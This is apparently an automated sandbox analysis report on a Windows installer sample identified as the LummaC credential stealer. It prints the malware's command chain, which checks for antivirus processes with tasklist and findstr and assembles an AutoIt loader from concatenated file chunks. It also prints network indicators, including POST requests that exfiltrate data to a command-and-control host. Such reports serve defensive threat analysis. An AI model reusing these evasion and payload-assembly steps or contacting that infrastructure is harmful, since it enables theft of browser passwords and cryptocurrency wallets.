Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
setup.exe

Overview

General Information

Sample name:setup.exe
Analysis ID:1604056
MD5:c804e1074af9d7cffa16e6bd084bea42
SHA1:dba96c1d8dd56520fcbc65b1d1dd0a8da91e81c5
SHA256:d0710b55aa4f4424d4b14ad320e6615dc230f2af271a1f260ea475141f9d0091
Tags:AutoITexeLummaStealeruser-aachum
Infos:

Detection

LummaC Stealer
Score:96
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Sigma detected: Search for Antivirus process
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
Drops PE files with a suspicious file extension
Joe Sandbox ML detected suspicious sample
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Crypto Currency Wallets
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality for read data from the clipboard
Contains functionality to dynamically determine API calls
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for user specific document files
Sigma detected: Suspicious Copy From or To System Directory
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication

Classification

  • System is w10x64
  • setup.exe (PID: 7408 cmdline: "C:\Users\user\Desktop\setup.exe" MD5: C804E1074AF9D7CFFA16E6BD084BEA42)
    • cmd.exe (PID: 7492 cmdline: "C:\Windows\System32\cmd.exe" /c copy Fashion Fashion.cmd & Fashion.cmd MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 7500 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • tasklist.exe (PID: 7552 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
      • findstr.exe (PID: 7560 cmdline: findstr /I "opssvc wrsa" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • tasklist.exe (PID: 7596 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
      • findstr.exe (PID: 7604 cmdline: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • cmd.exe (PID: 7640 cmdline: cmd /c md 224177 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • extrac32.exe (PID: 7656 cmdline: extrac32 /Y /E Wellington MD5: 9472AAB6390E4F1431BAA912FCFF9707)
      • findstr.exe (PID: 7684 cmdline: findstr /V "Tranny" Yale MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • cmd.exe (PID: 7704 cmdline: cmd /c copy /b 224177\Benefits.com + Photographer + Vacuum + Separate + Valium + Continuing + Training + Hours + Kissing + Accepts + Verde + Quotations 224177\Benefits.com MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • cmd.exe (PID: 7732 cmdline: cmd /c copy /b ..\Searches + ..\Coordinated + ..\Students + ..\Approve + ..\There + ..\Molecular + ..\Updated y MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Benefits.com (PID: 7748 cmdline: Benefits.com y MD5: 62D09F076E6E0240548C2F837536A46A)
      • choice.exe (PID: 7764 cmdline: choice /d y /t 5 MD5: FCE0E41C87DC4ABBE976998AD26C27E4)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
    sslproxydump.pcapJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security
      Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, Tim Shelton (HAWK.IO), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\cmd.exe" /c copy Fashion Fashion.cmd & Fashion.cmd, CommandLine: "C:\Windows\System32\cmd.exe" /c copy Fashion Fashion.cmd & Fashion.cmd, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\setup.exe", ParentImage: C:\Users\user\Desktop\setup.exe, ParentProcessId: 7408, ParentProcessName: setup.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c copy Fashion Fashion.cmd & Fashion.cmd, ProcessId: 7492, ProcessName: cmd.exe

      HIPS / PFW / Operating System Protection Evasion

      barindex
      Source: Process startedAuthor: Joe Security: Data: Command: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , CommandLine: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , CommandLine|base64offset|contains: ~), Image: C:\Windows\SysWOW64\findstr.exe, NewProcessName: C:\Windows\SysWOW64\findstr.exe, OriginalFileName: C:\Windows\SysWOW64\findstr.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c copy Fashion Fashion.cmd & Fashion.cmd, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7492, ParentProcessName: cmd.exe, ProcessCommandLine: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , ProcessId: 7604, ProcessName: findstr.exe
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2025-01-31T19:49:44.023631+010020283713Unknown Traffic192.168.2.449739172.67.158.151443TCP
      2025-01-31T19:49:45.570835+010020283713Unknown Traffic192.168.2.449740172.67.158.151443TCP
      2025-01-31T19:49:47.037204+010020283713Unknown Traffic192.168.2.449741172.67.158.151443TCP
      2025-01-31T19:49:57.512917+010020283713Unknown Traffic192.168.2.449742172.67.158.151443TCP
      2025-01-31T19:49:59.036455+010020283713Unknown Traffic192.168.2.449743172.67.158.151443TCP
      2025-01-31T19:50:00.310098+010020283713Unknown Traffic192.168.2.449744172.67.158.151443TCP
      2025-01-31T19:50:01.666407+010020283713Unknown Traffic192.168.2.449745172.67.158.151443TCP
      2025-01-31T19:50:03.869733+010020283713Unknown Traffic192.168.2.449747172.67.158.151443TCP
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2025-01-31T19:49:45.095924+010020546531A Network Trojan was detected192.168.2.449739172.67.158.151443TCP
      2025-01-31T19:49:46.413595+010020546531A Network Trojan was detected192.168.2.449740172.67.158.151443TCP
      2025-01-31T19:50:04.369801+010020546531A Network Trojan was detected192.168.2.449747172.67.158.151443TCP
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2025-01-31T19:49:45.095924+010020498361A Network Trojan was detected192.168.2.449739172.67.158.151443TCP
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2025-01-31T19:49:46.413595+010020498121A Network Trojan was detected192.168.2.449740172.67.158.151443TCP
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2025-01-31T19:50:01.672675+010020480941Malware Command and Control Activity Detected192.168.2.449745172.67.158.151443TCP
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2025-01-31T19:50:01.672675+010028438641A Network Trojan was detected192.168.2.449745172.67.158.151443TCP

      Click to jump to signature section

      Show All Signature Results

      AV Detection

      barindex
      Source: Submited SampleIntegrated Neural Analysis Model: Matched 81.2% probability
      Source: setup.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
      Source: unknownHTTPS traffic detected: 172.67.158.151:443 -> 192.168.2.4:49739 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.67.158.151:443 -> 192.168.2.4:49740 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.67.158.151:443 -> 192.168.2.4:49741 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.67.158.151:443 -> 192.168.2.4:49742 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.67.158.151:443 -> 192.168.2.4:49743 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.67.158.151:443 -> 192.168.2.4:49744 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.67.158.151:443 -> 192.168.2.4:49745 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.67.158.151:443 -> 192.168.2.4:49747 version: TLS 1.2
      Source: setup.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
      Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_004062D5 FindFirstFileW,FindClose,0_2_004062D5
      Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_00402E18 FindFirstFileW,0_2_00402E18
      Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_00406C9B DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,0_2_00406C9B
      Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\224177Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\224177\Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\Jump to behavior

      Networking

      barindex
      Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:49740 -> 172.67.158.151:443
      Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49739 -> 172.67.158.151:443
      Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49740 -> 172.67.158.151:443
      Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49739 -> 172.67.158.151:443
      Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49747 -> 172.67.158.151:443
      Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.4:49745 -> 172.67.158.151:443
      Source: Network trafficSuricata IDS: 2843864 - Severity 1 - ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2 : 192.168.2.4:49745 -> 172.67.158.151:443
      Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
      Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49740 -> 172.67.158.151:443
      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49742 -> 172.67.158.151:443
      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49747 -> 172.67.158.151:443
      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49741 -> 172.67.158.151:443
      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49745 -> 172.67.158.151:443
      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49744 -> 172.67.158.151:443
      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49743 -> 172.67.158.151:443
      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49739 -> 172.67.158.151:443
      Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: vividimaginatigon.top
      Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 48Host: vividimaginatigon.top
      Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=IKYW5VFNS082W5User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 18140Host: vividimaginatigon.top
      Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=N9S1VI3LFIHYWSDDUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8773Host: vividimaginatigon.top
      Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=KTQV5QXT9MPUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20396Host: vividimaginatigon.top
      Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=EM8QETX8VFQAGUJUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 2605Host: vividimaginatigon.top
      Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=04B1037J7DQ5LY7User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 585303Host: vividimaginatigon.top
      Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 83Host: vividimaginatigon.top
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: global trafficDNS traffic detected: DNS query: aWntkHZhzENhUIyZkjTD.aWntkHZhzENhUIyZkjTD
      Source: global trafficDNS traffic detected: DNS query: vividimaginatigon.top
      Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: vividimaginatigon.top
      Source: setup.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
      Source: setup.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
      Source: setup.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
      Source: setup.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
      Source: Benefits.com.1.dr, Verde.8.drString found in binary or memory: http://crl.globalsign.com/ca/gstsacasha384g4.crl0
      Source: Benefits.com.1.dr, Verde.8.drString found in binary or memory: http://crl.globalsign.com/gscodesignsha2g3.crl0
      Source: Benefits.com.1.dr, Quotations.8.drString found in binary or memory: http://crl.globalsign.com/root-r3.crl0G
      Source: Benefits.com.1.dr, Verde.8.drString found in binary or memory: http://crl.globalsign.com/root-r3.crl0c
      Source: Benefits.com.1.dr, Verde.8.drString found in binary or memory: http://crl.globalsign.com/root-r6.crl0G
      Source: setup.exeString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
      Source: setup.exeString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
      Source: setup.exeString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
      Source: setup.exeString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
      Source: setup.exeString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
      Source: setup.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
      Source: setup.exeString found in binary or memory: http://ocsp.digicert.com0
      Source: setup.exeString found in binary or memory: http://ocsp.digicert.com0A
      Source: setup.exeString found in binary or memory: http://ocsp.digicert.com0C
      Source: setup.exeString found in binary or memory: http://ocsp.digicert.com0X
      Source: Benefits.com.1.dr, Verde.8.drString found in binary or memory: http://ocsp.globalsign.com/ca/gstsacasha384g40C
      Source: Benefits.com.1.dr, Verde.8.drString found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g30V
      Source: Benefits.com.1.dr, Quotations.8.dr, Verde.8.drString found in binary or memory: http://ocsp2.globalsign.com/rootr306
      Source: Benefits.com.1.dr, Verde.8.drString found in binary or memory: http://ocsp2.globalsign.com/rootr606
      Source: Benefits.com.1.dr, Verde.8.drString found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g3ocsp.crt08
      Source: Benefits.com.1.dr, Verde.8.drString found in binary or memory: http://secure.globalsign.com/cacert/gstsacasha384g4.crt0
      Source: Benefits.com, 0000000C.00000000.1733371335.0000000001045000.00000002.00000001.01000000.00000008.sdmp, Benefits.com.1.dr, Verde.8.drString found in binary or memory: http://www.autoitscript.com/autoit3/X
      Source: setup.exeString found in binary or memory: http://www.digicert.com/CPS0
      Source: Benefits.com.1.dr, Verde.8.drString found in binary or memory: https://www.autoitscript.com/autoit3/
      Source: Verde.8.drString found in binary or memory: https://www.globalsign.com/repository/0
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
      Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
      Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
      Source: unknownHTTPS traffic detected: 172.67.158.151:443 -> 192.168.2.4:49739 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.67.158.151:443 -> 192.168.2.4:49740 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.67.158.151:443 -> 192.168.2.4:49741 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.67.158.151:443 -> 192.168.2.4:49742 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.67.158.151:443 -> 192.168.2.4:49743 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.67.158.151:443 -> 192.168.2.4:49744 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.67.158.151:443 -> 192.168.2.4:49745 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.67.158.151:443 -> 192.168.2.4:49747 version: TLS 1.2
      Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_004050CD GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_004050CD
      Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_004044A5 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_004044A5
      Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_00403883 EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,DeleteFileW,CoUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,InitOnceBeginInitialize,ExitWindowsEx,0_2_00403883
      Source: C:\Users\user\Desktop\setup.exeFile created: C:\Windows\ConnectorsTrustJump to behavior
      Source: C:\Users\user\Desktop\setup.exeFile created: C:\Windows\FooTaxJump to behavior
      Source: C:\Users\user\Desktop\setup.exeFile created: C:\Windows\HeraldContinentalJump to behavior
      Source: C:\Users\user\Desktop\setup.exeFile created: C:\Windows\UsaDramaticallyJump to behavior
      Source: C:\Users\user\Desktop\setup.exeFile created: C:\Windows\FittingMilJump to behavior
      Source: C:\Users\user\Desktop\setup.exeFile created: C:\Windows\InformedPastaJump to behavior
      Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_0040497C0_2_0040497C
      Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_00406ED20_2_00406ED2
      Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_004074BB0_2_004074BB
      Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\224177\Benefits.com 1300262A9D6BB6FCBEFC0D299CCE194435790E70B9C7B4A651E202E90A32FD49
      Source: C:\Users\user\Desktop\setup.exeCode function: String function: 004062A3 appears 58 times
      Source: setup.exeStatic PE information: invalid certificate
      Source: setup.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
      Source: classification engineClassification label: mal96.troj.spyw.evad.winEXE@26/24@2/1
      Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_004044A5 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_004044A5
      Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_004024FB CoCreateInstance,0_2_004024FB
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7500:120:WilError_03
      Source: C:\Users\user\Desktop\setup.exeFile created: C:\Users\user\AppData\Local\Temp\nsuC934.tmpJump to behavior
      Source: setup.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
      Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
      Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
      Source: C:\Users\user\Desktop\setup.exeFile read: C:\Users\desktop.iniJump to behavior
      Source: C:\Users\user\Desktop\setup.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
      Source: C:\Users\user\Desktop\setup.exeFile read: C:\Users\user\Desktop\setup.exeJump to behavior
      Source: unknownProcess created: C:\Users\user\Desktop\setup.exe "C:\Users\user\Desktop\setup.exe"
      Source: C:\Users\user\Desktop\setup.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Fashion Fashion.cmd & Fashion.cmd
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa"
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 224177
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\extrac32.exe extrac32 /Y /E Wellington
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V "Tranny" Yale
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b 224177\Benefits.com + Photographer + Vacuum + Separate + Valium + Continuing + Training + Hours + Kissing + Accepts + Verde + Quotations 224177\Benefits.com
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Searches + ..\Coordinated + ..\Students + ..\Approve + ..\There + ..\Molecular + ..\Updated y
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\224177\Benefits.com Benefits.com y
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5
      Source: C:\Users\user\Desktop\setup.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Fashion Fashion.cmd & Fashion.cmdJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa" Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 224177Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\extrac32.exe extrac32 /Y /E WellingtonJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V "Tranny" Yale Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b 224177\Benefits.com + Photographer + Vacuum + Separate + Valium + Continuing + Training + Hours + Kissing + Accepts + Verde + Quotations 224177\Benefits.comJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Searches + ..\Coordinated + ..\Students + ..\Approve + ..\There + ..\Molecular + ..\Updated yJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\224177\Benefits.com Benefits.com yJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5Jump to behavior
